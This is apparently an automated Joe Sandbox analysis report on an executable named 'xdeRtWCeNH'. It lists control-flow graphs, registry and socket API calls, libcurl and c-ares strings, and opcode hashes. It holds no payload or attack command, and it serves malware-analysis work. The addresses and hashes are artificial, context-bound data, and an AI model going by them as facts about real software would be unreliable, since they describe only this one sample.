789a60-789a6e call 786d60 1032->1038 1041 789a1f-789a39 call 786840 call 7863f0 1038->1041 1042 789a70-789a94 call 786200 call 7867e0 call 786320 1038->1042 1041->1030 1041->1032 1053 789a16-789a19 1042->1053 1054 789a96-789ac6 call 77d120 1042->1054 1053->1041 1056 789fc1 1053->1056 1059 789ac8-789adb call 77d120 1054->1059 1060 789ae1-789af7 call 77d190 1054->1060 1058 789fc5-789ffd call 785d00 call 77e2b0 * 2 1056->1058 1058->1003 1059->1041 1059->1060 1060->1041 1067 789afd-789b09 call 774fe0 1060->1067 1067->1056 1074 789b0f-789b29 call 77e730 1067->1074 1079 789b2f-789b3a call 7878a0 1074->1079 1080 789f84-789f88 1074->1080 1079->1080 1086 789b40-789b54 call 77e760 1079->1086 1081 789f95-789f99 1080->1081 1083 789f9b-789f9e 1081->1083 1084 789fa0-789fb6 call 77ebf0 * 2 1081->1084 1083->1056 1083->1084 1096 789fb7-789fbe 1084->1096 1092 789f8a-789f92 1086->1092 1093 789b5a-789b6e call 77e730 1086->1093 1092->1081 1099 789b8c-789b97 call 7863f0 1093->1099 1100 789b70-78a004 1093->1100 1096->1056 1108 789c9a-789cab call 77ea00 1099->1108 1109 789b9d-789bbf call 786740 call 7863f0 1099->1109 1104 78a015-78a01d 1100->1104 1106 78a01f-78a022 1104->1106 1107 78a024-78a045 call 77ebf0 * 2 1104->1107 1106->1058 1106->1107 1107->1058 1117 789f31-789f35 1108->1117 1118 789cb1-789ccd call 77ea00 call 77e960 1108->1118 1109->1108 1126 789bc5-789bda call 786d60 1109->1126 1120 789f40-789f61 call 77ebf0 * 2 1117->1120 1121 789f37-789f3a 1117->1121 1137 789cfd-789d0e call 77e960 1118->1137 1138 789ccf 1118->1138 1120->1041 1121->1041 1121->1120 1126->1108 1136 789be0-789bf4 call 786200 call 7867e0 1126->1136 1136->1108 1157 789bfa-789c0b call 786320 1136->1157 1146 789d10 1137->1146 1147 789d53-789d55 1137->1147 1141 789cd1-789cec call 77e9f0 call 77e4a0 1138->1141 1158 789cee-789cfb call 77e9d0 1141->1158 1159 789d47-789d51 1141->1159 1152 789d12-789d2d call 77e9f0 call 77e4a0 1146->1152 1151 789e69-789e8e call 77ea40 call 77e440 1147->1151 1174 789e90-789e92 1151->1174 1175 789e94-789eaa call 77e3c0 1151->1175 1178 789d5a-789d6f call 77e960 1152->1178 1179 789d2f-789d3c call 77e9d0 1152->1179 1172 789c11-789c1c call 787b70 1157->1172 1173 789b75-789b86 call 77ea00 1157->1173 1158->1137 1158->1141 1164 789dca-789ddb call 77e960 1159->1164 1185 789ddd-789ddf 1164->1185 1186 789e2e-789e36 1164->1186 1172->1099 1190 789c22-789c33 call 77e960 1172->1190 1173->1099 1196 789f2d 1173->1196 1183 789eb3-789ec4 call 77e9c0 1174->1183 1205 78a04a-78a04c 1175->1205 1206 789eb0-789eb1 1175->1206 1201 789d71-789d73 1178->1201 1202 789dc2 1178->1202 1179->1152 1198 789d3e-789d42 1179->1198 1183->1041 1208 789eca-789ed0 1183->1208 1195 789e06-789e21 call 77e9f0 call 77e4a0 1185->1195 1192 789e38-789e3b 1186->1192 1193 789e3d-789e5b call 77ebf0 * 2 1186->1193 1216 789c35 1190->1216 1217 789c66-789c75 call 7878a0 1190->1217 1192->1193 1203 789e5e-789e67 1192->1203 1193->1203 1232 789de1-789dee call 77ec80 1195->1232 1233 789e23-789e2c call 77eac0 1195->1233 1196->1117 1198->1151 1213 789d9a-789db5 call 77e9f0 call 77e4a0 1201->1213 1202->1164 1203->1151 1203->1183 1211 78a04e-78a051 1205->1211 1212 78a057-78a070 call 77ebf0 * 2 1205->1212 1206->1183 1215 789ee5-789ef2 call 77e9f0 1208->1215 1211->1056 1211->1212 1212->1096 1246 789d75-789d82 call 77ec80 1213->1246 1247 789db7-789dc0 call 77eac0 1213->1247 1215->1041 1240 789ef8-789f0e call 77e440 1215->1240 1224 789c37-789c51 call 77e9f0 1216->1224 1236 789c7b-789c8f call 77e7c0 1217->1236 1237 78a011 1217->1237 1224->1099 1262 789c57-789c64 call 77e9d0 1224->1262 1256 789df1-789e04 call 77e960 1232->1256 1233->1256 1236->1099 1257 789c95-78a00e 1236->1257 1237->1104 1260 789f10-789f26 call 77e3c0 1240->1260 1261 789ed2-789edf call 77e9e0 1240->1261 1267 789d85-789d98 call 77e960 1246->1267 1247->1267 1256->1186 1256->1195 1257->1237 1260->1261 1276 789f28 1260->1276 1261->1041 1261->1215 1262->1217 1262->1224 1267->1202 1267->1213 1276->1056
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00789946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00789974
                                                            • RegCloseKey.KERNELBASE(?), ref: 0078998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                            • API String ID: 3677997916-615551945
                                                            • Opcode ID: 2a080e62d773e279446958a05f9e9d4ae7a63f51c1fd5cb1f06df7517a52212f
                                                            • Instruction ID: 88c611d11a79ba82c6b6e3584fc3469c4231b5e1eb7bb596b3685d8875cd148d
                                                            • Opcode Fuzzy Hash: 2a080e62d773e279446958a05f9e9d4ae7a63f51c1fd5cb1f06df7517a52212f
                                                            • Instruction Fuzzy Hash: 5F32A6B6944201EBEB11BB24EC46A2B76D4AF54358F0C4474FA0D96263FB39ED14C7A3
                                                            Function 006F8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1382 6f8b50-6f8b69 1383 6f8b6b-6f8b74 1382->1383 1384 6f8be6 1382->1384 1386 6f8beb-6f8bf2 1383->1386 1387 6f8b76-6f8b8d 1383->1387 1385 6f8be9 1384->1385 1385->1386 1388 6f8b8f-6f8ba7 call 6d6e40 1387->1388 1389 6f8bf3-6f8bfe call 6fa550 1387->1389 1396 6f8bad-6f8baf 1388->1396 1397 6f8cd9-6f8d16 SleepEx 1388->1397 1394 6f8de4-6f8def 1389->1394 1395 6f8c04-6f8c08 1389->1395 1400 6f8e8c-6f8e95 1394->1400 1401 6f8df5-6f8e19 call 6fa150 1394->1401 1398 6f8c0e-6f8c1d 1395->1398 1399 6f8dbd-6f8dc3 1395->1399 1402 6f8ca6-6f8cb0 1396->1402 1403 6f8bb5-6f8bb9 1396->1403 1413 6f8d18-6f8d20 1397->1413 1414 6f8d22 1397->1414 1407 6f8c1f-6f8c34 connect 1398->1407 1408 6f8c35-6f8c48 call 6fa150 1398->1408 1399->1385 1405 6f8e97-6f8e9c 1400->1405 1406 6f8f00-6f8f06 1400->1406 1437 6f8e1b-6f8e26 1401->1437 1438 6f8e88 1401->1438 1402->1397 1409 6f8cb2-6f8cb8 1402->1409 1403->1386 1411 6f8bbb-6f8bc2 1403->1411 1415 6f8edf-6f8eef call 6c78b0 1405->1415 1416 6f8e9e-6f8eb6 call 6d2a00 1405->1416 1406->1386 1407->1408 1436 6f8c4d-6f8c4f 1408->1436 1417 6f8cbe-6f8cd4 call 6fb180 1409->1417 1418 6f8ddc-6f8dde 1409->1418 1411->1386 1412 6f8bc4-6f8bcc 1411->1412 1420 6f8bce-6f8bd2 1412->1420 1421 6f8bd4-6f8bda 1412->1421 1423 6f8d26-6f8d39 1413->1423 1414->1423 1440 6f8ef2-6f8efc 1415->1440 1416->1415 1442 6f8eb8-6f8edd call 6d3410 * 2 1416->1442 1417->1394 1418->1385 1418->1394 1420->1386 1420->1421 1421->1386 1430 6f8bdc-6f8be1 1421->1430 1433 6f8d3b-6f8d3d 1423->1433 1434 6f8d43-6f8d61 call 6dd8c0 call 6fa150 1423->1434 1439 6f8dac-6f8db8 call 7050a0 1430->1439 1433->1418 1433->1434 1461 6f8d66-6f8d74 1434->1461 1444 6f8c8e-6f8c93 1436->1444 1445 6f8c51-6f8c58 1436->1445 1446 6f8e2e-6f8e85 call 6dd090 call 704fd0 1437->1446 1447 6f8e28-6f8e2c 1437->1447 1438->1400 1439->1386 1440->1406 1442->1440 1454 6f8c99-6f8c9f 1444->1454 1455 6f8dc8-6f8dd9 call 6fb100 1444->1455 1445->1444 1451 6f8c5a-6f8c62 1445->1451 1446->1438 1447->1438 1447->1446 1457 6f8c6a-6f8c70 1451->1457 1458 6f8c64-6f8c68 1451->1458 1454->1402 1455->1418 1457->1444 1463 6f8c72-6f8c8b call 7050a0 1457->1463 1458->1444 1458->1457 1461->1386 1466 6f8d7a-6f8d81 1461->1466 1463->1444 1466->1386 1467 6f8d87-6f8d8f 1466->1467 1471 6f8d9b-6f8da1 1467->1471 1472 6f8d91-6f8d95 1467->1472 1471->1386 1475 6f8da7 1471->1475 1472->1386 1472->1471 1475->1439
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 006F8C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 006F8CF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: 8fe6deba3505280d65b3f5cd95230f600748ed5ac4525f5f0ffef33473d97d20
                                                            • Instruction ID: e02c04afb769331aa3e9acd298657505a742641d04c8843faffa748fab73c764
                                                            • Opcode Fuzzy Hash: 8fe6deba3505280d65b3f5cd95230f600748ed5ac4525f5f0ffef33473d97d20
                                                            • Instruction Fuzzy Hash: E1B1C37060430AAFDB10CF24C985BB6B7E2AF45314F0489ADEA594B3D2DB71EC59C761
                                                            Function 006C2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1476 6c2f17-6c2f8c call b498f0 call b49ce0 1481 6c31c9-6c31cd 1476->1481 1482 6c2f91-6c2ff4 call 6c1619 RegOpenKeyExA 1481->1482 1483 6c31d3-6c31d6 1481->1483 1486 6c2ffa-6c300b 1482->1486 1487 6c31c5 1482->1487 1488 6c315c-6c31ac RegEnumKeyExA 1486->1488 1487->1481 1489 6c3010-6c3083 call 6c1619 RegOpenKeyExA 1488->1489 1490 6c31b2-6c31c2 RegCloseKey 1488->1490 1493 6c314e-6c3152 1489->1493 1494 6c3089-6c30d4 RegQueryValueExA 1489->1494 1490->1487 1493->1488 1495 6c313b-6c314b RegCloseKey 1494->1495 1496 6c30d6-6c3137 call b49bc0 call b49c50 call b49ce0 call b49af0 call b49ce0 call b48050 1494->1496 1495->1493 1496->1495
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: CloseEnumOpen
                                                            • String ID: d
                                                            • API String ID: 1332880857-2564639436
                                                            • Opcode ID: bb3021d31b05fc225fe2f27781bc1fb782c3ba784d9771de54ea7bf3ea7b3ec3
                                                            • Instruction ID: 9cce3ddcc54f7e5d86a835f3fb19d125a4659c7b3bab0b7e03dabdd936940076
                                                            • Opcode Fuzzy Hash: bb3021d31b05fc225fe2f27781bc1fb782c3ba784d9771de54ea7bf3ea7b3ec3
                                                            • Instruction Fuzzy Hash: EF7170B49043199FDB50EF69D58479EBBF0FF84308F1088ADE89897311D7749A898F92
                                                            Function 006C76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1509 6c76a0-6c76be 1510 6c76e6-6c76f2 send 1509->1510 1511 6c76c0-6c76c7 1509->1511 1513 6c775e-6c7762 1510->1513 1514 6c76f4-6c7709 call 6c72a0 1510->1514 1511->1510 1512 6c76c9-6c76d1 1511->1512 1515 6c770b-6c7759 call 6c72a0 call 6ccb20 call a48c50 1512->1515 1516 6c76d3-6c76e4 1512->1516 1514->1513 1515->1513 1516->1514
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,N=l,00000000,?,?,006D07BF), ref: 006C76EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$N=l$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-658039478
                                                            • Opcode ID: 4291b6107594aa23eb1d12f459a341c0da45908742cdcadf35a84e87c6495df0
                                                            • Instruction ID: 7cbce2c238dceca0bdb28a01777a10894a9c724ac0ad5283191415c178fd6f02
                                                            • Opcode Fuzzy Hash: 4291b6107594aa23eb1d12f459a341c0da45908742cdcadf35a84e87c6495df0
                                                            • Instruction Fuzzy Hash: B41159B5A183187BD110AF56AC8AF377B5DDFC2B28F040D2DF80863352E6619D018AF2
                                                            Function 006F9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1628 6f9290-6f92ed call 6c76a0 1631 6f93c3-6f93ce 1628->1631 1632 6f92f3-6f92fb 1628->1632 1641 6f93e5-6f9427 call 6dd090 call 704f40 1631->1641 1642 6f93d0-6f93e1 1631->1642 1633 6f93aa-6f93af 1632->1633 1634 6f9301-6f9333 call 6dd8c0 call 6dd9a0 1632->1634 1635 6f9456-6f9470 1633->1635 1636 6f93b5-6f93bc 1633->1636 1652 6f93a7 1634->1652 1653 6f9335-6f9364 WSAIoctl 1634->1653 1639 6f93be 1636->1639 1640 6f9429-6f9431 1636->1640 1639->1635 1645 6f9439-6f943f 1640->1645 1646 6f9433-6f9437 1640->1646 1641->1635 1641->1640 1642->1636 1647 6f93e3 1642->1647 1645->1635 1651 6f9441-6f9453 call 7050a0 1645->1651 1646->1635 1646->1645 1647->1635 1651->1635 1652->1633 1656 6f939b-6f93a4 1653->1656 1657 6f9366-6f936f 1653->1657 1656->1652 1657->1656 1660 6f9371-6f9390 setsockopt 1657->1660 1660->1656 1661 6f9392-6f9395 1660->1661 1661->1656
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 006F935D
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 006F9389
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: ec42123e7d1234296567dd024de8831568fe8c477be947ded03688ffe7d75a27
                                                            • Instruction ID: d1950998a6788346ed9c5eed29d102c5df794afc57903e8cd385789eacfbb0e8
                                                            • Opcode Fuzzy Hash: ec42123e7d1234296567dd024de8831568fe8c477be947ded03688ffe7d75a27
                                                            • Instruction Fuzzy Hash: 5451E675A00309ABD715DF24C881FBA77A6FF84314F148529FE488B382E731E951CBA1
                                                            Function 006C7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1662 6c7770-6c778e 1663 6c77b6-6c77c2 recv 1662->1663 1664 6c7790-6c7797 1662->1664 1666 6c782e-6c7832 1663->1666 1667 6c77c4-6c77d9 call 6c72a0 1663->1667 1664->1663 1665 6c7799-6c77a1 1664->1665 1668 6c77db-6c7829 call 6c72a0 call 6ccb20 call a48c50 1665->1668 1669 6c77a3-6c77b4 1665->1669 1667->1666 1668->1666 1669->1667
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: 8ba558306a01729db4e3edbc76365e1fc87e024b25e2fbd6d201a3edeceef330
                                                            • Instruction ID: c4cc7347d9b4c5e81199ad609b55665cdc48df418b7de7d364841001fe94a6dc
                                                            • Opcode Fuzzy Hash: 8ba558306a01729db4e3edbc76365e1fc87e024b25e2fbd6d201a3edeceef330
                                                            • Instruction Fuzzy Hash: 1E1127B5A193183BD120AF559C4EF7B3B5DDBC2B28F44092DB80863352D6219D018AF1
                                                            Function 006C75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1681 6c75e0-6c75ed 1682 6c75ef-6c75f6 1681->1682 1683 6c7607-6c7629 socket 1681->1683 1682->1683 1684 6c75f8-6c75ff 1682->1684 1685 6c763f-6c7642 1683->1685 1686 6c762b-6c763c call 6c72a0 1683->1686 1687 6c7601-6c7602 1684->1687 1688 6c7643-6c7699 call 6c72a0 call 6ccb20 call a48c50 1684->1688 1686->1685 1687->1683
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
